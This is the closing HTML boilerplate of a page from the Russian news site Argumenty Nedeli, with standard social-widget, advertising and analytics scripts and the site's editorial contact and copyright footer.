		js.onload = js.onreadystatechange = function () {
		if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
		if (!this.executed) {
		this.executed = true;
		setTimeout(function () {
		OK.CONNECT.insertGroupWidget(id,did,st);
		}, 0);
		}
		}}
		d.documentElement.appendChild(js);
		}(document,"ok_group_widget","54308951490571","{width:240,height:335}");
		</script>
        </section>   

   </div>



	<div id="parthers_link"><a href="http://www.argumenti.ru/parthers">Новости партнеров</a>&nbsp;/<a href="http://www.argumenti.ru/info" rel="nofollow">Информация</a></div>
		<div id="block__fix-adv_r">
		<div id="gnezdo_ru_15140">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/15140/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
		
	</div>

	</div>		<div class="our_partners">
	<div>
		<h5 class="namerub" style="text-align:left;"><span class="rem">//</span>Наши партнеры</h5>
			<!-- ex_adv 31 --><a href="http://mdsokol.ru" alt="" target="_blank" rel="nofollow"><img src="http://www.argumenti.ru/images/partners/830.jpg" width="200" height="200"></a>										</div>
</div>

	<footer>


		<div class="foot_menu"><div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics">Политика</a></li>
			<li><a href="http://argumenti.ru/economics">Экономика</a></li>
			<li><a href="http://argumenti.ru/society">Общество</a></li>
			<li><a href="http://argumenti.ru/world">В мире</a></li>			
			<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/sport">Спорт</a></li>
			<li><a href="http://argumenti.ru/lifestyle">Лайфстайл</a></li>
			<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
			<li><a href="http://argumenti.ru/culture">Культура</a></li>
		</ul>
</div></div>


<div class="footer_line">



	<div id="logo_footer">

	<p>Адрес редакции: Москва, ул. Тверская, д. 8/2 стр. 1</p>
<div id="endline"><p>Учредитель: ЗАО ИД "Аргументы недели"</p>
	<p>Главный редактор сайта: Олег Желтов</p>
	<p style="margin-top:5px;">Возрастная категория сайта: <span class="plus18">18+</span><!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t44.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a>")
//--></script><!--/LiveInternet--></p>
</div>

	</div>


	<div id="copy">
		<ul id="footer_menu">
			<li>Редакция: <a href="tel:+74959816836">+7 (495) 981-68-36</a> / <a href="mailto:anonline@argumenti.ru" rel="nofollow">anonline@argumenti.ru</a></li>
			<li><a href="http://argumenti.ru/reklama/tarif.html" rel="nofollow">Реклама в газете:</a> <a href="tel:+74959815263">+7 (495) 638-52-63</a></li>
			<li>Реклама на сайте: <a href="mailto:kapkova@argumenti.ru" rel="nofollow">kapkova@argumenti.ru</a></li>
			<li><a href="http://argumenti.ru/pub/doc/an.pdf" target="_blank" rel="nofollow">Об издании</a></li>
		</ul>
		<p>Свободное использование в Интернет-пространстве текстов, фото и видеоматериалов, опубликованных на этом сайте, допускается при условии обязательного размещения гиперссылки на источник публикации www.argumenti.ru. Использование материалов в печатных СМИ допускается только с письменного разрешения редакции. 
					Сетевое издание "Аргументы неделi". Свидетельство о регистрации Эл № ФС77-60728 от 09 февраля 2015 г. выдано Федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор).
		


	</div>
	<div id = "rating">
<ul id="socnets" style="margin-bottom:48px;">
				<li><a class="vk" target="_blank" href="http://vkontakte.ru/club14409962" rel="nofollow"></a></li>
				<li><a class="tw" target="_blank" href="http://twitter.com/argumenti" rel="nofollow"></a></li>
				<li><a class="fb" target="_blank" href="https://www.facebook.com/argumentinedeli" rel="nofollow"></a></li>
				<li><a class="mm" target="_blank" href="http://my.mail.ru/community/argumenti" rel="nofollow"></a></li>
				<li><a class="ok" target="_blank" href="http://www.odnoklassniki.ru/argumenti" rel="nofollow"></a></li>
				<li><a class="in" target="_blank" href="http://instagram.com/argumenti.ru" rel="nofollow"></a></li>
			</ul>



<span class="counter">

<!-- Rating@Mail.ru logo -->
<a href="http://top.mail.ru/jump?from=1069168" rel="nofollow">
<img src="//top-fwz1.mail.ru/counter?id=1069168;t=479;l=1"
style="border:0;" height="31" width="88" alt="Рейтинг@Mail.ru" /></a>
<!-- //Rating@Mail.ru logo -->

</span>



<a style="float:right" target="_blank" href="http://www.rambler.ru/" rel="nofollow">"Партнер Рамблера"</a>




</div>
</div>


<!--<div id="footer_parthers"></div>-->

</footer>

</div>

<!--/noindex-->


<script type="text/javascript">
//<![CDATA[
yandex_direct_place = 'ya_direct';
yandex_partner_id = 50615;
yandex_site_bg_color = 'FFFFFF';
yandex_site_charset = 'utf-8';
yandex_ad_format = 'direct';
yandex_font_size = .75;
yandex_direct_type = 'vertical';
yandex_direct_limit = 5;
yandex_direct_header_bg_color = 'ECECEC';
yandex_direct_bg_color = 'ECECEC';
yandex_direct_border_color = 'FFFFFF';
yandex_direct_title_color = '000000';
yandex_direct_url_color = '666666';
yandex_direct_all_color = '000000';
yandex_direct_text_color = '000000';
yandex_direct_hover_color = '000000';
yandex_direct_favicon = true;
//]]>
</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-11186859-1', 'auto');
  ga('send', 'pageview');

</script>

		
</body>
</html>